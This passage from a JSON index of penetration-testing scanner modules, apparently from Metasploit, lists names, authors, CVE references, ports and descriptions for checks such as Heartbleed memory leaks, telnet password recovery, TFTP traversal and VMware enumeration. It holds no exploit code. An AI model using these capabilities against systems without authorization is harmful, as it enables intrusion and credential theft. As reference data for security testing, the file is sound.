"CVE-2017-17382",
"CVE-2017-17427",
"CVE-2017-17428",
"CVE-2017-12373",
"CVE-2017-13098",
"CVE-2017-1000385",
"CVE-2017-13099",
"CVE-2016-6883",
"CVE-2012-5081",
"URL-https://robotattack.org",
"URL-https://eprint.iacr.org/2017/1189",
"URL-https://github.com/robotattackorg/robot-detect"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py",
"is_install_path": true,
"ref_name": "scanner/ssl/bleichenbacher_oracle",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ROBOT",
"Adaptive chosen-ciphertext attack"
]
}
},
"auxiliary_scanner/ssl/openssl_ccs": {
"name": "OpenSSL Server-Side ChangeCipherSpec Injection Scanner",
"full_name": "auxiliary/scanner/ssl/openssl_ccs",
"rank": 300,
"disclosure_date": "2014-06-05",
"type": "auxiliary",
"author": [
"Masashi Kikuchi",
"Craig Young <CYoung@tripwire.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module checks for the OpenSSL ChangeCipherSpec (CCS)\n Injection vulnerability. The problem exists in the handling of early\n CCS messages during session negotiation. Vulnerable installations of OpenSSL accepts\n them, while later implementations do not. If successful, an attacker can leverage this\n vulnerability to perform a man-in-the-middle (MITM) attack by downgrading the cipher spec\n between a client and server. This issue was first reported in early June, 2014.",
"references": [
"CVE-2014-0224",
"URL-http://ccsinjection.lepidum.co.jp/",
"URL-http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html",
"URL-http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/",
"URL-https://www.imperialviolet.org/2014/06/05/earlyccs.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb",
"is_install_path": true,
"ref_name": "scanner/ssl/openssl_ccs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssl/openssl_heartbleed": {
"name": "OpenSSL Heartbeat (Heartbleed) Information Leak",
"full_name": "auxiliary/scanner/ssl/openssl_heartbleed",
"rank": 300,
"disclosure_date": "2014-04-07",
"type": "auxiliary",
"author": [
"Neel Mehta",
"Riku",
"Antti",
"Matti",
"Jared Stafford <jspenguin@jspenguin.org>",
"FiloSottile",
"Christian Mehlmauer <FireFart@gmail.com>",
"wvu <wvu@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Sebastiano Di Paola",
"Tom Sellers",
"jjarmoc",
"Ben Buchanan",
"herself"
],
"description": "This module implements the OpenSSL Heartbleed attack. The problem\n exists in the handling of heartbeat requests, where a fake length can\n be used to leak memory data in the response. Services that support\n STARTTLS may also be vulnerable.\n\n The module supports several actions, allowing for scanning, dumping of\n memory contents to loot, and private key recovery.\n\n The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.\n\n The repeat command can be used to make running the SCAN or DUMP many\n times more powerful. As in:\n repeat -t 60 run; sleep 2\n To run every two seconds for one minute.",
"references": [
"CVE-2014-0160",
"US-CERT-VU-720951",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-098A",
"URL-http://heartbleed.com/",
"URL-https://github.com/FiloSottile/Heartbleed",
"URL-https://gist.github.com/takeshixx/10107280",
"URL-http://filippo.io/Heartbleed/"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
"is_install_path": true,
"ref_name": "scanner/ssl/openssl_heartbleed",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Heartbleed"
]
}
},
"auxiliary_scanner/steam/server_info": {
"name": "Gather Steam Server Information",
"full_name": "auxiliary/scanner/steam/server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module uses the A2S_INFO request to obtain information from a Steam server.",
"references": [
"URL-https://developer.valvesoftware.com/wiki/Server_queries#A2S_INFO"
],
"platform": "",
"arch": "",
"rport": 27015,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/steam/server_info.rb",
"is_install_path": true,
"ref_name": "scanner/steam/server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telephony/wardial": {
"name": "Wardialer",
"full_name": "auxiliary/scanner/telephony/wardial",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"I)ruid <druid@caughq.org>"
],
"description": "Scan for dial-up systems that are connected to modems and answer telephony indials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telephony/wardial.rb",
"is_install_path": true,
"ref_name": "scanner/telephony/wardial",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/brocade_enable_login": {
"name": "Brocade Enable Login Check Scanner",
"full_name": "auxiliary/scanner/telnet/brocade_enable_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will test a range of Brocade network devices for a\n privileged logins and report successes. The device authentication mode\n must be set as 'aaa authentication enable default local'.\n Telnet authentication, e.g. 'enable telnet authentication', should not\n be enabled in the device configuration.\n\n This module has been tested against the following devices:\n ICX6450-24 SWver 07.4.00bT311,\n FastIron WS 624 SWver 07.2.02fT7e1",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/brocade_enable_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/lantronix_telnet_password": {
"name": "Lantronix Telnet Password Recovery",
"full_name": "auxiliary/scanner/telnet/lantronix_telnet_password",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jgor"
],
"description": "This module retrieves the setup record from Lantronix serial-to-ethernet\n devices via the config port (30718/udp, enabled by default) and extracts the\n telnet password. It has been tested successfully on a Lantronix Device Server\n with software version V5.8.0.1.",
"references": [
],
"platform": "",
"arch": "",
"rport": 30718,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/lantronix_telnet_password",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/lantronix_telnet_version": {
"name": "Lantronix Telnet Service Banner Detection",
"full_name": "auxiliary/scanner/telnet/lantronix_telnet_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Detect Lantronix telnet services",
"references": [
],
"platform": "",
"arch": "",
"rport": 9999,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/lantronix_telnet_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/satel_cmd_exec": {
"name": "Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability",
"full_name": "auxiliary/scanner/telnet/satel_cmd_exec",
"rank": 300,
"disclosure_date": "2017-04-07",
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters\n to perform arbitrary command execution as 'root'.",
"references": [
"CVE-2017-6048",
"URL-https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02"
],
"platform": "",
"arch": "",
"rport": 5000,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/satel_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_encrypt_overflow": {
"name": "Telnet Service Encryption Key ID Overflow Detection",
"full_name": "auxiliary/scanner/telnet/telnet_encrypt_overflow",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jaime Penalba Estebanez <jpenalbae@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)",
"references": [
"BID-51182",
"CVE-2011-4862",
"EDB-18280",
"URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2018-02-14 09:19:28 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_encrypt_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_login": {
"name": "Telnet Login Check Scanner",
"full_name": "auxiliary/scanner/telnet/telnet_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "This module will test a telnet login on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_ruggedcom": {
"name": "RuggedCom Telnet Password Generator",
"full_name": "auxiliary/scanner/telnet/telnet_ruggedcom",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Borja Merino <bmerinofe@gmail.com>",
"jc"
],
"description": "This module will calculate the password for the hard-coded hidden username\n \"factory\" in the RuggedCom Rugged Operating System (ROS). The password is\n dynamically generated based on the devices MAC address.",
"references": [
"CVE-2012-1803",
"EDB-18779",
"US-CERT-VU-889195"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_ruggedcom",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_version": {
"name": "Telnet Service Banner Detection",
"full_name": "auxiliary/scanner/telnet/telnet_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect telnet services",
"references": [
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_version.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/teradata/teradata_odbc_login": {
"name": "Teradata ODBC Login Scanner Module",
"full_name": "auxiliary/scanner/teradata/teradata_odbc_login",
"rank": 300,
"disclosure_date": "2018-03-30",
"type": "auxiliary",
"author": [
"Ted Raffle (actuated)"
],
"description": "Login scanner module for ODBC connections to Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Blank passwords are not supported by ODBC connections.\n\n Requires ODBC driver and Python Teradata module.",
"references": [
"URL-https://developer.teradata.com/tools/reference/teradata-python-module",
"URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux"
],
"platform": "",
"arch": "",
"rport": 1025,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py",
"is_install_path": true,
"ref_name": "scanner/teradata/teradata_odbc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"Teradata ODBC Login Scanner"
]
}
},
"auxiliary_scanner/tftp/ipswitch_whatsupgold_tftp": {
"name": "IpSwitch WhatsUp Gold TFTP Directory Traversal",
"full_name": "auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp",
"rank": 300,
"disclosure_date": "2011-12-12",
"type": "auxiliary",
"author": [
"Prabhu S Angadi",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp\n Gold's TFTP service.",
"references": [
"OSVDB-77455",
"BID-50890",
"EDB-18189",
"URL-http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt",
"CVE-2011-4722"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb",
"is_install_path": true,
"ref_name": "scanner/tftp/ipswitch_whatsupgold_tftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/tftp/netdecision_tftp": {
"name": "NetDecision 4.2 TFTP Directory Traversal",
"full_name": "auxiliary/scanner/tftp/netdecision_tftp",
"rank": 300,
"disclosure_date": "2009-05-16",
"type": "auxiliary",
"author": [
"Rob Kraus",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This modules exploits a directory traversal vulnerability in NetDecision 4.2\n TFTP service.",
"references": [
"CVE-2009-1730",
"OSVDB-54607",
"BID-35002"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb",
"is_install_path": true,
"ref_name": "scanner/tftp/netdecision_tftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/tftp/tftpbrute": {
"name": "TFTP Brute Forcer",
"full_name": "auxiliary/scanner/tftp/tftpbrute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"antoine"
],
"description": "This module uses a dictionary to brute force valid TFTP image names from a TFTP server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb",
"is_install_path": true,
"ref_name": "scanner/tftp/tftpbrute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ubiquiti/ubiquiti_discover": {
"name": "Ubiquiti Discovery Scanner",
"full_name": "auxiliary/scanner/ubiquiti/ubiquiti_discover",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Detects Ubiquiti devices using a UDP discovery service",
"references": [
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A",
"URL-https://community.ubnt.com/t5/airMAX-General-Discussion/airOS-airMAX-and-management-access/td-p/2654023",
"URL-https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/"
],
"platform": "",
"arch": "",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-02-01 14:49:14 +0000",
"path": "/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.rb",
"is_install_path": true,
"ref_name": "scanner/ubiquiti/ubiquiti_discover",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/udp/udp_amplification": {
"name": "UDP Amplification Scanner",
"full_name": "auxiliary/scanner/udp/udp_amplification",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Detect UDP endpoints with UDP amplification vulnerabilities",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/udp/udp_amplification.rb",
"is_install_path": true,
"ref_name": "scanner/udp/udp_amplification",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/upnp/ssdp_amp": {
"name": "SSDP ssdp:all M-SEARCH Amplification Scanner",
"full_name": "auxiliary/scanner/upnp/ssdp_amp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Discover SSDP amplification possibilities",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb",
"is_install_path": true,
"ref_name": "scanner/upnp/ssdp_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/upnp/ssdp_msearch": {
"name": "UPnP SSDP M-SEARCH Information Discovery",
"full_name": "auxiliary/scanner/upnp/ssdp_msearch",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Discover information from UPnP-enabled systems",
"references": [
"CVE-2012-5958",
"CVE-2012-5959",
"CVE-2013-0230",
"CVE-2013-0229"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb",
"is_install_path": true,
"ref_name": "scanner/upnp/ssdp_msearch",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/varnish/varnish_cli_file_read": {
"name": "Varnish Cache CLI File Read",
"full_name": "auxiliary/scanner/varnish/varnish_cli_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"patrick",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module attempts to read the first line of a file by abusing the error message when\n compiling a file with vcl.load.",
"references": [
"OSVDB-67670",
"CVE-2009-2936",
"EDB-35581",
"URL-https://www.varnish-cache.org/trac/wiki/CLI"
],
"platform": "",
"arch": "",
"rport": 6082,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-09 11:25:13 +0000",
"path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/varnish/varnish_cli_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/varnish/varnish_cli_login": {
"name": "Varnish Cache CLI Login Utility",
"full_name": "auxiliary/scanner/varnish/varnish_cli_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce\n list of passwords.",
"references": [
"OSVDB-67670",
"CVE-2009-2936",
"EDB-35581",
"URL-https://www.varnish-cache.org/trac/wiki/CLI"
],
"platform": "",
"arch": "",
"rport": 6082,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
"is_install_path": true,
"ref_name": "scanner/varnish/varnish_cli_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/esx_fingerprint": {
"name": "VMWare ESX/ESXi Fingerprint Scanner",
"full_name": "auxiliary/scanner/vmware/esx_fingerprint",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module accesses the web API interfaces for VMware ESX/ESXi servers\n and attempts to identify version information for that server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/esx_fingerprint",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmauthd_login": {
"name": "VMWare Authentication Daemon Login Scanner",
"full_name": "auxiliary/scanner/vmware/vmauthd_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will test vmauthd logins on a range of machines and\n report successful logins.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 902,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmauthd_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmauthd_version": {
"name": "VMWare Authentication Daemon Version Scanner",
"full_name": "auxiliary/scanner/vmware/vmauthd_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module will identify information about a host through the\n vmauthd service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 902,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmauthd_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_permissions": {
"name": "VMWare Enumerate Permissions",
"full_name": "auxiliary/scanner/vmware/vmware_enum_permissions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to enumerate\n all the user/group permissions. Unlike enum users this is only\n users and groups that specifically have permissions defined within\n the VMware product",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_permissions",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_sessions": {
"name": "VMWare Enumerate Active Sessions",
"full_name": "auxiliary/scanner/vmware/vmware_enum_sessions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to enumerate\n all the login sessions.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_sessions",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_users": {
"name": "VMWare Enumerate User Accounts",
"full_name": "auxiliary/scanner/vmware/vmware_enum_users",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to enumerate\n all the user accounts. If the VMware instance is connected to one or\n more domains, it will try to enumerate domain users as well.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_users",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_vms": {
"name": "VMWare Enumerate Virtual Machines",
"full_name": "auxiliary/scanner/vmware/vmware_enum_vms",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_vms",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_host_details": {
"name": "VMWare Enumerate Host Details",
"full_name": "auxiliary/scanner/vmware/vmware_host_details",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to enumerate information about the host systems through the VMWare web API.\n This can include information about the hardware installed on the host machine.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_host_details",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_http_login": {
"name": "VMWare Web Login Scanner",
"full_name": "auxiliary/scanner/vmware/vmware_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to authenticate to the VMWare HTTP service\n for VmWare Server, ESX, and ESXI",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-01 07:26:12 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_screenshot_stealer": {
"name": "VMWare Screenshot Stealer",
"full_name": "auxiliary/scanner/vmware/vmware_screenshot_stealer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module uses supplied login credentials to connect to VMWare via\n the web interface. It then searches through the datastores looking for screenshots.\n It will download any screenshots it finds and save them as loot.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_screenshot_stealer",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_server_dir_trav": {
"name": "VMware Server Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/vmware/vmware_server_dir_trav",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
